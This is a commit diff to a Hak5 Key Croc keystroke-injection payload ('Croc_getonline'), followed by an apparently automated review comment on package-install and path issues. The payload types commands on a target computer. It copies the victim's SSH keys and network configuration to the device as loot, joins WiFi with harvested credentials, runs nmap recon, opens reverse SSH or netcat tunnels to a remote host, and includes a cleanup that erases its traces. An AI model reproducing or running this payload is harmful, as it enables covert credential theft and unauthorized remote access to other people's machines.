Update Croc_getonline.txt
minor changes: added starting the default browser on the target pull/62/head
parent
6e08132c37
commit
3743f48375
@ -2,7 +2,7 @@
|
|||
# Description: Attempt to connect Keycroc automatically to target wifi access point
|
||||
# Save to tools/wifipass.txt, tools/old_wifipass.txt & recon loot to /root/udisk/tools/Target_SSID.txt
|
||||
# Author: spywill
|
||||
# Version: 4.2
|
||||
# Version: 4.3
|
||||
# Category: Key Croc
|
||||
# Props: Cribbit, Lodrix, potong, RootJunky, dark_pyrro
|
||||
|
||||
|
@ -19,13 +19,20 @@
|
|||
# getonline_X <-- MATCH word for Remove Croc_Getonline payload, contents and reboot
|
||||
# getonline_T <-- MATCH word for Stopping ICMP/PORT alert
|
||||
|
||||
MATCH (getonline_W|getonline_R|getonline_L|getonline_N|getonline_F|getonline_K|getonline_S|getonline_H|getonline_P|getonline_A|getonline_X)
|
||||
# option=0 Run payload as normal
|
||||
# option=1 Run payload as normal, open terminal on target
|
||||
# option=2 Run payload as normal, start reverse SSH tunnel using SSH
|
||||
# option=3 Run payload as normal, start reverse SSH tunnel using NETCAT
|
||||
# option=4 Run payload as normal, open web page
|
||||
|
||||
MATCH getonline+_[A-Z]{1}
|
||||
QUACK LOCK
|
||||
|
||||
#---> Edit payload option below
|
||||
option=0
|
||||
keycroc_password=hak5croc
|
||||
wifi_pass=/tools/wifipass.txt
|
||||
web_page=https://forums.hak5.org/
|
||||
|
||||
#---> Edit remote host below
|
||||
remote_user_name=EDIT_REMOTE_USERNAME_HERE
|
||||
|
@ -37,10 +44,12 @@ port=7000
|
|||
known_ssid=EDIT_KNOWN_SSID_HERE
|
||||
known_ssid_password=EDIT_KNOWN_SSID_PASSWORD_HERE
|
||||
|
||||
#---> Edit recon scan on/off below
|
||||
#---> Edit recon scan on/off below & nmap
|
||||
recon=off
|
||||
nmap_scan="nmap -T4 -F"
|
||||
recon_loot=/root/udisk/tools/Target_SSID.txt
|
||||
|
||||
#---> Edit ICMP/PORT alert on/off below & iptables time out
|
||||
alert=off
|
||||
alert_time=60
|
||||
|
||||
|
@ -57,14 +66,14 @@ recon_scan() {
|
|||
QUACK STRING "ipconfig /all | Out-File -Encoding UTF8 \"\$MOUNT_POINT\tools\Target_SSID.txt\""
|
||||
QUACK ENTER
|
||||
QUACK DELAY 2000
|
||||
QUACK STRING "if (Test-Path -Path ~/.ssh) { \$destination = Join-Path -Path \$MOUNT_POINT -ChildPath \"tools\Target_SSH_KEY.txt\"; if (-not (Test-Path -Path \$destination)) { New-Item -ItemType Directory -Path \$destination | Out-Null }; Copy-Item -Path ~/.ssh\* -Destination \$destination } else { \$false }"
|
||||
QUACK STRING "if (Test-Path -Path ~/.ssh) { \$destination = Join-Path -Path \$MOUNT_POINT -ChildPath \"tools\Target_SSH_KEY\"; if (-not (Test-Path -Path \$destination)) { New-Item -ItemType Directory -Path \$destination | Out-Null }; Copy-Item -Path ~/.ssh\* -Destination \$destination } else { \$false }"
|
||||
QUACK ENTER
|
||||
QUACK DELAY 2000
|
||||
elif [ "$LOOT" = "getonline_R" ] || [ "$LOOT" = "getonline_L" ]; then
|
||||
QUACK STRING "ifconfig -a > \"\$MOUNT_POINT/tools/Target_SSID.txt\""
|
||||
QUACK ENTER
|
||||
QUACK DELAY 2000
|
||||
QUACK STRING "[ -d ~/.ssh ] && cp -fr ~/.ssh/. \"\$MOUNT_POINT/tools/Target_SSH_KEY.txt\" || :"
|
||||
QUACK STRING "[ -d ~/.ssh ] && cp -fr ~/.ssh/. \"\$MOUNT_POINT/tools/Target_SSH_KEY\" || :"
|
||||
QUACK ENTER
|
||||
QUACK DELAY 2000
|
||||
else
|
||||
|
@ -211,31 +220,37 @@ case $LOOT in
|
|||
fi
|
||||
;;
|
||||
getonline_K)
|
||||
ifconfig wlan0 down
|
||||
LED R
|
||||
ifconfig wlan0 down
|
||||
RESET_PAYLOAD
|
||||
;;
|
||||
getonline_S)
|
||||
ATTACKMODE HID STORAGE
|
||||
sleep 3
|
||||
RESET_PAYLOAD
|
||||
;;
|
||||
getonline_H)
|
||||
ATTACKMODE HID
|
||||
sleep 3
|
||||
RESET_PAYLOAD
|
||||
;;
|
||||
getonline_P)
|
||||
ATTACKMODE HID SERIAL
|
||||
sleep 3
|
||||
RESET_PAYLOAD
|
||||
;;
|
||||
getonline_A)
|
||||
ATTACKMODE HID AUTO_ETHERNET
|
||||
sleep 3
|
||||
RESET_PAYLOAD
|
||||
;;
|
||||
getonline_X)
|
||||
LED R
|
||||
rm -f /root/udisk/payloads/Croc_getonline.txt
|
||||
rm -f /root/udisk/tools/wifipass.txt /root/udisk/tools/old_wifipass.txt
|
||||
rm -f /root/udisk$wifi_pass /root/udisk/tools/old_wifipass.txt
|
||||
rm -f $recon_loot root/udisk/config.txt
|
||||
rm -f /root/udisk/tools/firewall-rules-backup.txt
|
||||
rm -r /root/udisk/tools/Target_SSH_KEY
|
||||
apt -y remove sshpass
|
||||
reboot --force
|
||||
RESET_PAYLOAD
|
||||
|
@ -254,6 +269,12 @@ case $LOOT in
|
|||
:
|
||||
fi
|
||||
RESET_PAYLOAD
|
||||
;;
|
||||
*)
|
||||
LED R
|
||||
sleep 1
|
||||
LED OFF
|
||||
RESET_PAYLOAD
|
||||
;;
|
||||
esac
|
||||
sleep 3
|
||||
|
@ -285,8 +306,8 @@ if [ "$LOOT" = "getonline_W" ]; then
|
|||
fi
|
||||
|
||||
sed -i 's/\( \)*/\1/g' ~/udisk$wifi_pass
|
||||
sed -i -E -e '/^[WS]/d' -e '9 a WIFI_SSID\nWIFI_PASS\nSSH ENABLE' ~/udisk/config.txt
|
||||
sed -i -E -e '1{x;s#^#sed -n 1p '/root/udisk$wifi_pass'#e;x};10{G;s/\n(\S+).*/ \1/};11{G;s/\n\S+//}' root/udisk/config.txt
|
||||
sed -i -E -e '/^[WS]/d' -e '14 a WIFI_SSID\nWIFI_PASS\nSSH ENABLE' ~/udisk/config.txt
|
||||
sed -i -E -e '1{x;s#^#sed -n 1p '/root/udisk$wifi_pass'#e;x};15{G;s/\n(\S+).*/ \1/};16{G;s/\n\S+//}' root/udisk/config.txt
|
||||
wpa_passphrase $(sed 's/ .*//' ~/udisk$wifi_pass) $(sed 's/.* //' ~/udisk$wifi_pass) > /etc/wpa_supplicant.conf
|
||||
|
||||
ifconfig wlan0 up
|
||||
|
@ -326,7 +347,7 @@ if : >/dev/tcp/8.8.8.8/53; then
|
|||
QUACK ENTER
|
||||
elif [ $option -eq 2 ]; then
|
||||
status="$(dpkg-query -W --showformat='${db:Status-Status}' "sshpass" 2>&1)"
|
||||
[ $? = 0 ] || [ "$status" = installed ] && : || apt -y install sshpass
|
||||
[ $? = 0 ] || [ "$status" = installed ] && : || apt --force-yes install sshpass
|
||||
sleep 1
|
||||
if nmap -sn "$remote_host_ip" | grep -q "Host is up"; then
|
||||
[ -f ~/.ssh/id_rsa.pub ] && : || ssh-keygen -t rsa -N "" -f ~/.ssh/id_rsa
|
||||
|
@ -345,6 +366,29 @@ if : >/dev/tcp/8.8.8.8/53; then
|
|||
LED R
|
||||
sleep 1
|
||||
fi
|
||||
elif [ $option -eq 4 ]; then
|
||||
if [ "$LOOT" = "getonline_W" ]; then
|
||||
QUACK GUI d
|
||||
QUACK GUI r
|
||||
QUACK DELAY 2000
|
||||
QUACK STRING "powershell"
|
||||
QUACK ENTER
|
||||
QUACK DELAY 2000
|
||||
QUACK STRING "Start-Process $web_page & exit"
|
||||
QUACK ENTER
|
||||
elif [ "$LOOT" = "getonline_R" ]; then
|
||||
QUACK CONTROL-ALT-d
|
||||
QUACK CONTROL-ALT-t
|
||||
QUACK DELAY 2000
|
||||
QUACK STRING "xdg-open $web_page & exit"
|
||||
QUACK ENTER
|
||||
elif [ "$LOOT" = "getonline_L" ]; then
|
||||
QUACK CONTROL-ALT-d
|
||||
QUACK ALT-t
|
||||
QUACK DELAY 2000
|
||||
QUACK STRING "xdg-open $web_page & exit"
|
||||
QUACK ENTER
|
||||
fi
|
||||
else
|
||||
LED FINISH
|
||||
fi
|
||||
|
@ -364,7 +408,7 @@ if [ "$recon" = "on" ]; then
|
|||
|
||||
perform_nmap_scan() {
|
||||
echo -ne "\n\nNmap with target: $network_range\n\n" >> $recon_loot
|
||||
nmap -T4 -F $network_range >> $recon_loot
|
||||
$nmap_scan $network_range >> $recon_loot
|
||||
}
|
||||
calculate_network_range
|
||||
perform_nmap_scan
|
||||
|
@ -382,7 +426,7 @@ if [ "$alert" = "on" ]; then
|
|||
icmp_alert() {
|
||||
calculate_network_range
|
||||
sleep 1
|
||||
until (tcpdump -c 1 -n '((icmp and icmp[0]=8) or (udp and src net '$network_range' and (dst port 33434 or dst port 33534))) and not src host '$ip_address'' | grep -o "IP.*" | sed 's/id.*//g; s/length.*//g' | sed 's/IP/\n&/g'); do
|
||||
until (tcpdump -c 1 -n '((icmp and icmp[0]=8) or (udp and src net '$network_range' and (dst port 33434 or dst port 33534))) and not src host '$ip_address''); do
|
||||
:
|
||||
done
|
||||
LED R SLOW
|
||||
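Review bot: The rewritten `sshpass` install line replaces `apt -y install sshpass` with `apt --force-yes install sshpass`; apt-get documents `--force-yes` as deprecated and dangerous because it also disables package authentication (it stands in for `--allow-unauthenticated` together with the other `--allow-*` overrides), so a tampered mirror or spoofed repository could put an unsigned package on the device. If the intent was only a non-interactive install, the previous `-y` already covers that, and any specific override should be passed explicitly, e.g. `apt -y --allow-downgrades install sshpass`. Separately, the new `sed -i -E -e '1{x;...};15{G;...};16{G;...}' root/udisk/config.txt` line (and the `rm -f $recon_loot root/udisk/config.txt` cleanup in the `getonline_X` arm) uses a relative path while every other reference is `~/udisk/config.txt` or `/root/udisk/...`; unless the payload is guaranteed to run with `/` as its working directory that command silently edits nothing, so it should read `/root/udisk/config.txt`. The enclosing `if : >/dev/tcp/8.8.8.8/53` block starts and ends outside the hunk that carries the apt change.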